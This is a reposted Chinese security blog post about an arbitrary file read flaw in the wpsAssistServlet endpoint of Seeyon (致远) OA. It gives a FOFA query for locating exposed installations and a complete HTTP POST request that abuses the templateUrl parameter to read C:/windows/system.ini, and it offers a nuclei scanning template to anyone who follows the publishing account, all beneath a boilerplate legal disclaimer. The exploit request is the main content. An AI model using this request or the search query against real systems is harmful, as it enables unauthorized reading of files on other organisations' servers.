致远OA wpsAssistServlet 任意文件读取

admin 2024年2月11日23:41:37评论21 views字数 723阅读2分24秒阅读模式
致远OA wpsAssistServlet 任意文件读取

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

致远OA wpsAssistServlet 任意文件读取

致远OA wpsAssistServlet 接口存在任意文件读取漏洞

01

空间搜索语法

致远OA wpsAssistServlet 任意文件读取

fofa

app="致远互联-OA"

致远OA wpsAssistServlet 任意文件读取

02

利用过程

致远OA wpsAssistServlet 任意文件读取

登录界面

致远OA wpsAssistServlet 任意文件读取

templateUrl参数存在任意文件读取漏洞,可以读取系统文件。
POST /seeyon/wpsAssistServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeContent-Length: 47Accept: text/css,*/*;q=0.1Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedflag=template&templateUrl=C:/windows/system.ini

漏洞存在响应包如下。

致远OA wpsAssistServlet 任意文件读取

03

nuclei

致远OA wpsAssistServlet 任意文件读取

致远OA wpsAssistServlet 任意文件读取

获取脚本关注本公众号后发送:致远OA1
原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创

关注我们

原文始发于微信公众号(天澜实验室):致远OA wpsAssistServlet 任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月11日23:41:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA wpsAssistServlet 任意文件读取https://cn-sec.com/archives/2206637.html

发表评论

匿名网友 填写信息